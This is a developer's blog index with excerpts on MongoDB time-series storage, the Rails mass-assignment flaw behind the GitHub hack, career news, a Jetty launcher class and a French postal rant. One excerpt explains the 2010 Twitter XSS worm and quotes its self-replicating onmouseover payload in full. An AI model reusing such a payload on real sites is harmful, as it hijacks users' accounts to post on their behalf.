Efficient storage of non-periodic time series with MongoDB

Posted on 21 January 2015 - 18:20

TL;DR: this post explains the MongoDB storage structure we use at Actoboard to efficiently store non periodic time series. Storing one Mongo document for each data point is woefully inefficient, so we store them in fixed-size segments, which speeds things up by more than an order of magnitude.

MongoDB makes the developer's life easier

When we started Actoboard, we decided to use MongoDB to store all our data. I already used it successfully on several projects, and it makes things a lot easier compared to an SQL database when you have a rich data model using a lot of polymorphic structures. You don't have this impedance mismatch between application objects and tables that has produced these object-relational monsters we've loved to hate.

MongoDB is nice for all our configuration data (data sources, widgets, etc): JSON documents are perfect for these fat polymorphic configuration objects, the volume of such data is limited, and the load is mostly read, avoiding the lock problems Mongo has in write-heavy scenarios.

Time series need special attention

Time series data is a different beast, with a write-mostly load of tiny objects consisting of dataset id, timestamp and value. The naive approach of storing each data point as a tiny document will yield poor write performance, as the database has to allocate space for every tiny document holding a data point and add it to the index, which will be almost as large as the actual data.

Read performance will be bad too as the data for a series will be spread in many places on disk, requiring lots of disk seeks when reading a time slice. Deletion of expired data will also create lots of holes on disk, increasing load on the database's space allocator.

Continue reading »

GitHub hack: a common security flaw in webapp frameworks

Posted on 08 March 2012 - 12:55

GitHub has faced a spectacular hack: a disappointed developer has exploited a weakness in Ruby on Rails to gain commit access to the Rails master branch and create issues in the future. As a result, GitHub asks us to confirm our ssh keys, but this can have been used to change almost any data in the system.

How's it possible?

This weakness comes from the mass assignment feature in Rails. To ease development and increase productivity, Rails allows an object to be filled with any http request parameter whose name match an attribute of the object. All is well when people use the forms provided by your web pages, because they only send parameters for attributes that you (the developer) want to change. Now things are different when someone forges a request: your object is wide open, and they can change all of its attributes.

If you have a User class with properties id, name, password, role, then a user with role "visitor" can upgrade himself to "administrator" simply using the profile edition URL. Or change the password of another user to get access to his account by changing the id value, or... etc.

Most modern web frameworks have this mass assignment feature. They allow the developer to restrict the assignable attributes by means of whitelists or blacklists, but most if not all of them have it wide open by default. This is a comfortable developer feature, but how many of them will even think of protecting their model?

Continue reading »

My 2011: a year like no other

Posted on 01 January 2012 - 13:15

This blog has been mostly silent in 2011. Blame both Twitter that makes capturing quick thoughts so easy and a busy year as I started my freelance business. But a new year is starting, and along with the traditional wishes I owe an update to the people that still look around here. There have been many important events in the world this year, but I will talk about the selfish me, since this year has been like no other in my professional life.

I'm my own boss!

When I decided to go freelance, I thought it would be for a limited time while I worked on setting up a new startup project. It turned out this was a rather ambitious project, one of the kind I was a bit tired of, requiring a lot of work before reaching out to the world, and that the people I had planned to build it with were not the right ones for this kind of venture.

So I started to grow my freelance business, working 3 days a week architecting and developing the backend systems of a new M2M solution using J2EE (mostly Jetty and Spring), Hazelcast and MongoDB, and doing some short expert consulting gigs in various domains: data collection architecture, mobile geolocation app strategy, search engines, etc. I also did some fun side projects exploring augmented reality and Kinect hacks with my son and my friends at Tetalab, the Toulouse hackerspace.

Continue reading »

How often do you redeploy your J2EE application?

Posted on 11 January 2011 - 11:37

The guys at ZeroTurnaround have published an interesting report on the development habits from over 1300 Java developers. One of the questions that really struck me was "how often do you redeploy?"

My answer to this question is "on my development machine, never". I use Jetty which is really easy to embed in a regular application. So all of the projets I work on have this tiny class in their src/run/java directory:

package net.bluxte.project;

import org.eclipse.jetty.server.Server;
import org.eclipse.jetty.server.nio.SelectChannelConnector;
import org.eclipse.jetty.webapp.WebAppContext;

public class StartProject {
    public static void main(String[] args) throws Exception {
        Server server = new Server();
        SelectChannelConnector connector = new SelectChannelConnector();
        WebAppContext context = new WebAppContext("src/main/webapp", "/");

This tiny class allows me to start the server with just a single click on Eclipse's "Run" or "Debug" icons in the toolbar, using the project's classpath where everything is already compiled by the IDE. No need to build a war file, no need to attach to a remote JVM for debugging, no need to wait for long package/deploy/restart operations. And of course code hotswap works just like it should and makes debugging a breeze.

Now the answer "on my development machine, never" is incomplete, and should be added "on the integration server, every time a source file changes" since Hudson picks up any changes, does a full build/test cycle and deploys the new version automatically on a test machine.

Complex "enterprisey" frameworks and specifications have made us forget that things can be simple if you think a bit, and that it also often pays to do a bit of "development design" to increase the developer's productivity without resorting to "helper tools" that only add some bloat to the process.

Continue reading »

New year, new job

Posted on 10 January 2011 - 11:05

It's been 2 months since I left my previous job. I used this time to get some rest, think about what I wanted to do next, meet people and have lots of discussions. I've also been questioning myself if it was time to join a larger company and leave behind the crazy but exciting jobs of startups. Leaving the startup world felt to me like abandoning an environment where creation and ideas are king for something more structured, more "quiet" I would say, but also with larger projects.

I finally decided I still had a lot to do in startups, after meeting a guy who's been passionate about 3D virtual worlds for years and sharing intense excitement with him when talking about WebGL that will soon bring native 3D to modern browsers. So we decided to explore this route and setup a project that hopefully will lead to a new startup.

In the meantime, I've established myself as a freelance consultant, to keep bringing home the bacon and because my experience seems to be of interest! I've already started working part time architecting the backend systems of a former colleague's new startup. This fills my schedule for now, but I'm always open to interesting proposals.

So check out my resume and let's get in touch if you think I could help you in your projects.

My last day at Goojet

Posted on 29 October 2010 - 17:41

Today was my last day at Goojet. I've been the CTO there since april 2008, and have been involved informally with their team since even before the company was created in 2007.

As in every startup, there has been ups and downs, incredible times with an amazing creative energy, and times of doubt when the result of our work did not seem to attract as many users as we expected. We reinvented ourselves a couple of times and have some very loyal users but still not the masses that make a success. The company must now focus on a smaller and more agile core, and the technical challenges aren't as complex and movitating for me as they were when I joined. This is why we have decided it was time for me to move on to something else.

At Goojet I learned the many sides of developing for mobiles: the importance of user experience, network latency, buggy operator gateways, device fragmentation with a J2ME application that runs on more than 400 phones, and the great fun that is developing on iPhone and Android. On the backend side, I was even closer to operations than I was at Joost, being responsible for the overall system architecture and quality of service.

I will miss the team. Very talented people, some of which have been working with me for 6 years or more, when they started as interns at Anyware, then employees, and embarking with me for the Joost adventure, and some others who I came to know and value in this job. It feels like leaving behind people you have helped growing, but I know they're great professionals who will do a great job without my guidance. And they're still good friends even if no more colleagues!

So what's next for me? I have realized that I need to take a break from the emotional involvement and more-than-fulltime dedication that is required by being a founder or CTO of a small startup. I will probably work as a consultant to see other projects, meet new people, address different challenges.

Check out my resume and let me now if you think we should be working together!

Continue reading »

Today is the answer to Life, the Universe and Everything

Posted on 10 October 2010 - 10:10

Warning: super-geeky stuff ahead :-)

Today is October 10, 2010, or in other words 10-10-10. This is in itself a noticeable date, but it gets even more interesting when you consider that 101010 is the binary value for 42!

So today is not only 10-10-10, but also the day of the answer to Life, the Universe and Everything!

And to be even more geeky (or scary): guess who made me notice that? My 14 years old son...

10 years ago, my first mail to Apache...

Posted on 07 October 2010 - 21:43

Damn, I missed the date! A bit more than 10 years ago, on September 4, 2000 I sent my very first mail to an Apache mailing-list, cocoon-users. The day after I sent my first mail to cocoon-dev. And again, and again, and again... More than 4700 mails sent to the Cocoon lists over 10 years!

As you can see from the graph, the mails/month rate has been growing steadily until the beginning of 2006, when Joost absorbed all my time and energy on quite tricky but nevertheless fun stuff!

I'm no more involved in Cocoon, as are many of the old-timers I worked with at that time, but it has been incredibly rewarding, both personally for all the friends I made and professionally for all the things I learned and the changes in my career path.

Twitter victim of a basic XSS attack

Posted on 21 September 2010 - 16:40

The (twit)world is taken by storm with today's Javascript injection attack against Twitter. This attack is so basic it's strange it hasn't been found earlier neither by the Twitter team nor by script kiddies.

Here's what it looks like :

Twitter XSS

The code for the black section is the following :

<span class="entry-content"><a href="http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/" class="tweet-url web" rel="nofollow" target="_blank">http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/</a></span>

The hacker has simply posted a URL (in bold above) containing a double quote that closes the link's href attribute. From there on, the door is wide open to do nasty things.

The script replicates itself by automatically posting the script-injection URL on behalf of the current user. The clever bit is the style attribute that is also added to hide the cryptic link and "invite" the curious user to move their mouse on this black zone. This is when the onmouseover kicks in and replicates the worm.

Although it spreads like fire, it doesn't do much harm beyond replicating itself. But a malicious variation could well send your authentication cookie to a remote server so that its owner can use your Twitter account.

Continue reading »

ColiPoste : double présentation, double peine

Posted on 10 May 2010 - 12:28

To my english speaking readers: this is a rant about the french national parcel delivery service, that insists on ringing two times (one day and the day after) at my door while I'm at work, thus causing frustrating delays in the delivery.

Une fois n'est pas coutume, voici un article en français et sur un sujet non technique. Mais c'est pour parler d'une institution bien française, La Poste. C'est l'histoire d'un colis qui m'a été envoyé mardi dernier (le 4 mai), qui a été présenté chez moi deux jours après, le 6 mai, mais que je n'aurai que demain, le 11 mai.

Depuis quelque temps, le service de livraison de colis, ColiPoste, a eu la "bonne idée" de mettre en place une double présentation du colis à votre domicile. Si le livreur arrive et que vous êtes absent, il vous laisse un papier vous informant qu'il repassera le lendemain. Et si vous n'êtes pas là le lendemain, vous pourrez finalement aller chercher le colis à votre bureau de poste habituel le surlendemain.

On connait tous la chanson : « Lundi matin, le roi, sa femme et le p'tit prince, sont venus chez moi, pour me serrer la pince. Comme j'étais parti, le p'tit prince a dit "puisque c'est ainsi nous repasserons mardi". Mardi matin, le roi, sa femme et le p'tit prince ». Etc, ad nauseam. Si je ne suis pas chez moi un jour de semaine, c'est fort probablement parce que je travaille, et je serai donc absent aussi le lendemain ! Et je dois donc attendre un jour de plus avant d'aller à la Poste retirer mon colis. Double peine...

Continue reading »
Actoboard - Realtime dashboards for business metrics